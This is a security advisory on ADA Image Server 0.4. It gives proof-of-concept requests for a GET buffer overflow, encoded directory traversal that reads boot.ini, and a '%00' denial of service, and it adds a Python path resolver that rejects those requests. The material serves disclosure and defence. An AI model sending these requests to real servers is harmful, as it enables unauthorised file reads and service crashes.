The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
http://www.securiteam.com
ADA Image Server (ImgSvr) Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
ADA Image Server (<http://sourceforge.net/projects/adaimgsvr/>) is "an
embedded web server that is specialized in photo album publishing. This
Image server provides an HTTP based access to image content. It generates
dynamic pages from a standard directory based hierarchy, manages
thumbnails, metadata". Multiple security vulnerabilities have been found
in the product. These include a buffer overflow in the GET request,
directory traversal vulnerabilities, and denial of service vulnerabilities.
DETAILS
Vulnerable Systems:
* ADA Image Server (ImgSvr) version 0.4
Buffer Overflow in GET / request:
There is a buffer overflow in ADA image server that occurs whenever an
attacker sends a GET request followed by 2,112 characters. An attacker may
exploit this vulnerability to make your web server crash or even execute
arbitrary code:
Get /[2,112 chars] http/1.0
Directory Traversal Vulnerabilities:
The vulnerability occurs whenever an attacker uses the pattern
"%2f%2e%2e%2f" (a percent-encoded "/../"). Because these sequences are not
properly checked for directory traversal, an attacker can download any file
that resides outside the bounding HTML root directory:
http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
Or view the directory contents:
http://[host]:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
Denial of Service:
By supplying a "%00" in the URL, a remote user can crash the server using
the following request:
http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/
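As an added example (not ImgSvr's code), the following Python request-path resolver shows how a file server avoids both the encoded "%2f%2e%2e%2f" traversal and the "%00" request described above: it percent-decodes once, rejects NUL bytes and ".." segments, and then confirms the resolved path still lies under the document root. The POSIX document root and the sample requests are assumed for illustration.

```python
import os
from urllib.parse import unquote_to_bytes


class UnsafePath(ValueError):
    """Raised for a request path that must not be served."""


def resolve_request_path(doc_root: str, raw_path: str) -> str:
    """Map the path part of an HTTP request line onto a file under doc_root,
    returning the absolute filesystem path or raising UnsafePath."""
    # Decode every percent-escape exactly once, to bytes, so "%2f" and "%2e"
    # are already "/" and "." when the traversal check runs. Decoding only
    # once also means a double-encoded "%252e" stays a literal "%2e" segment.
    decoded = unquote_to_bytes(raw_path.split("?", 1)[0])

    # A NUL byte is never part of a real filename; it is what the "%00"
    # request in the advisory relies on, so reject it before anything else.
    if b"\x00" in decoded:
        raise UnsafePath("NUL byte in request path")
    try:
        text = decoded.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise UnsafePath("request path is not valid UTF-8") from exc

    # Treat backslash as a separator too (the advisory's target is a Windows
    # host fetching boot.ini), drop empty and "." segments, refuse "..".
    segments = [s for s in text.replace("\\", "/").split("/") if s not in ("", ".")]
    if ".." in segments:
        raise UnsafePath("parent-directory segment in request path")

    # Defence in depth: resolve symlinks and confirm the result is still
    # inside the document root (commonpath equals the root itself).
    root = os.path.realpath(doc_root)
    target = os.path.realpath(os.path.join(root, *segments))
    if os.path.commonpath([root, target]) != root:
        raise UnsafePath("resolved path escapes the document root")
    return target


def is_safe_request(doc_root: str, raw_path: str) -> bool:
    """True if the request path would be served, False if it is rejected."""
    try:
        resolve_request_path(doc_root, raw_path)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    ROOT = "/srv/imgsvr-root"  # hypothetical document root
    for req in ("/album/cat.jpg",  # constructed samples, incl. advisory shapes
                "/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini",
                "/%2f%2e%2e%2f%2f%2e%2e%2f/", "/%00/imgsvr.exe/imgsvr.exe"):
        print(f"{req!r} -> {'serve' if is_safe_request(ROOT, req) else 'REJECT'}")
```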
ADDITIONAL INFORMATION
The information has been provided by dr_insane (<mailto:dr_insane@pathfinder.gr>).